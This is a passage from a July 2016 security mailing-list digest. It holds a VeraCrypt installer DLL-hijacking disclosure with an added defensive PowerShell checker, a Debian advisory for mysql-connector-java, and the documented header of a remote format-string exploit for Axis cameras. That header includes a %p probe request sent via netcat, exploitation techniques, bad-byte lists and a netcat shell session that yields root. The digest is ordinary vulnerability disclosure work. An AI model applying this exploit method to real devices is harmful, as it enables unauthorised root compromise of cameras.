[CVE-2016-1281] NOT FIXED: VeraCrypt*Setup*.exe still vulnerable to DLL hijacking

2016-07-18 Thread Stefan Kanthak
Hi @ll,

this is basically a follow-up to 

CVE-2016-1281 is NOT FIXED!

I've retested the current "VeraCrypt Setup 1.17.exe" on a fully
patched Windows 7, and it is STILL (or AGAIN) vulnerable there.

The following DLLs are loaded from the "application directory"
and their DllMain() executed: VSSAPI.dll, ATL.dll, VSSTrace.dll.

See ,
 and
 for details
about this well-known and well-documented beginner's error!

Due to the application manifest embedded in the executable installer
which specifies "requireAdministrator" the installer is run with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of the DLLs therefore results
in an escalation of privilege!

For software downloaded with a web browser the "application
directory" is typically the user's "Downloads" directory: see
,

and  for prior
art!


Mitigation:
~~~

DUMP executable installers, build packages for the target OS' native
installer instead!

See 
as well as  for the long
sad story of these vulnerabilities.


stay tuned
Stefan Kanthak


Timeline:
~

2015-12-23  vulnerability report sent to author

2016-01-03  author confirmed vulnerability, got CVE-2016-1281

            worked with author until he finally was able to build
            an installer which didn't show this vulnerability.

            Also notified author:
            "as soon as Microsoft introduces new/other dependencies
             between Windows' system DLLs or refactors them (again)
             this vulnerability will VERY likely resurface again."

2016-01-11  report published by author (see above)

2016-07-01  vulnerability report sent to author ("I told you so!")

            NO RESPONSE

2016-07-17  report published
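A defender-side check for the situation the post describes, added here as an example and not part of Stefan Kanthak's report: it lists the executables in a download directory, flags those whose embedded manifest asks for "requireAdministrator", and reports whether any of the DLL names the post says the installer loads from its application directory (VSSAPI.dll, ATL.dll, VSSTrace.dll) sit beside them. The manifest test is a raw text search of the file rather than a PE resource parse, so it is a heuristic; the directory default and the function names are this example's own.

```powershell
# Added example (not from the post): find downloaded installers that both
# request administrator rights and have a hijackable DLL name planted next
# to them. Heuristic: the manifest is located by a plain text search, since
# it is stored as ASCII/UTF-8 XML in the RT_MANIFEST resource.
param(
    [string]$Directory = (Join-Path $env:USERPROFILE 'Downloads')
)

# DLL names the post lists as loaded from the application directory.
$HijackableDlls = @('VSSAPI.dll', 'ATL.dll', 'VSSTrace.dll')

function Test-RequireAdministrator {
    param([string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
    return [bool]($text -match 'requestedExecutionLevel\s+level\s*=\s*"requireAdministrator"')
}

function Find-PlantedDlls {
    param([string]$Directory)
    # Hijackable names actually present in the directory (-contains is case-insensitive).
    $present = @(Get-ChildItem -Path $Directory -Filter '*.dll' -File |
        Where-Object { $HijackableDlls -contains $_.Name } |
        ForEach-Object { $_.Name })

    foreach ($exe in Get-ChildItem -Path $Directory -Filter '*.exe' -File) {
        $elevates = Test-RequireAdministrator -Path $exe.FullName
        [pscustomobject]@{
            Installer            = $exe.Name
            RequireAdministrator = $elevates
            ColocatedDlls        = ($present -join ', ')
            # Elevating installer plus a planted DLL is the escalation path the post describes.
            AtRisk               = $elevates -and ($present.Count -gt 0)
        }
    }
}

Find-PlantedDlls -Directory $Directory | Format-Table -AutoSize
```

An installer that shows AtRisk = True should be run from an empty directory, or, following the post's mitigation, replaced by a package for the OS' native installer.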


[SECURITY] [DSA 3621-1] mysql-connector-java security update

2016-07-18 Thread Salvatore Bonaccorso

Debian Security Advisory DSA-3621-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
July 18, 2016 https://www.debian.org/security/faq

Package: mysql-connector-java
CVE ID : CVE-2015-2575

A vulnerability was discovered in mysql-connector-java, a Java database
(JDBC) driver for MySQL, which may result in unauthorized update, insert
or delete access to some MySQL Connectors accessible data as well as
read access to a subset of MySQL Connectors accessible data. The
vulnerability was addressed by upgrading mysql-connector-java to the new
upstream version 5.1.39, which includes additional changes, such as bug
fixes, new features, and possibly incompatible changes. Please see the
MySQL Connector/J Release Notes and Oracle's Critical Patch Update
advisory for further details:

 https://dev.mysql.com/doc/relnotes/connector-j/5.1/en/news-5-1.html
 http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html#AppendixMSQL

For the stable distribution (jessie), this problem has been fixed in
version 5.1.39-1~deb8u1.

We recommend that you upgrade your mysql-connector-java packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon

2016-07-18 Thread bashis

#!/usr/bin/env python2.7
#
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis 2016
#
# This format string vulnerability has the following characteristics:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output to the remote attacker)(*)
# - Remotely exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistics.
#
# This exploit has the following characteristics:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell normally gives shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
#   - "One-Write-Where-And-What" for MIPS and CRISv32
#     Using "Old Style" POP's
#     Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
#     Shellcode loaded in memory by sending shellcode URL encoded, which the SSI daemon decodes and keeps in memory.
#   - "Two-Write-Where-And-What" for ARM
#     1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
#     2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
#     [Big difference in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able to POP with as little as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# 500 Server Error
# 500 Server Error
# The server encountered an internal error and could not complete your request.
#
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
#  Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
#  Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted in a remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1.  Direct addressing with %$%n is "delayed", and comes in force only after disconnect.
#     Old method with POP's comes into force instantly
#
# 2.  Argument "0" will be assigned (after using old POP method and %n WRITE) the next address on stack after POP's)
#     - Would be interesting to investigate why.
#
# 3.  Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
#     Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
#     Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
#     Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4.  Everything is randomized, except heap.
#
# 5.  My initial attempts to use ROP's were not good, as I didn't want to create
#     one unique FMS key by testing each single firmware version, and using ROP with FMS
#     on heap seems pretty complicated as there is one jump available, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode was the best technique in this case.
#
# 6.  Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS executed on heap
#
# 7.  Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
#     so executing shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit have been verified by setting executable stack flag bit on binaries,
#     and re-compiling the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8.  This exploit is pretty well documented, more details can be extracted by reading
#     the code and comments.
#
# MIPS ssid maps
# 0040-0040d000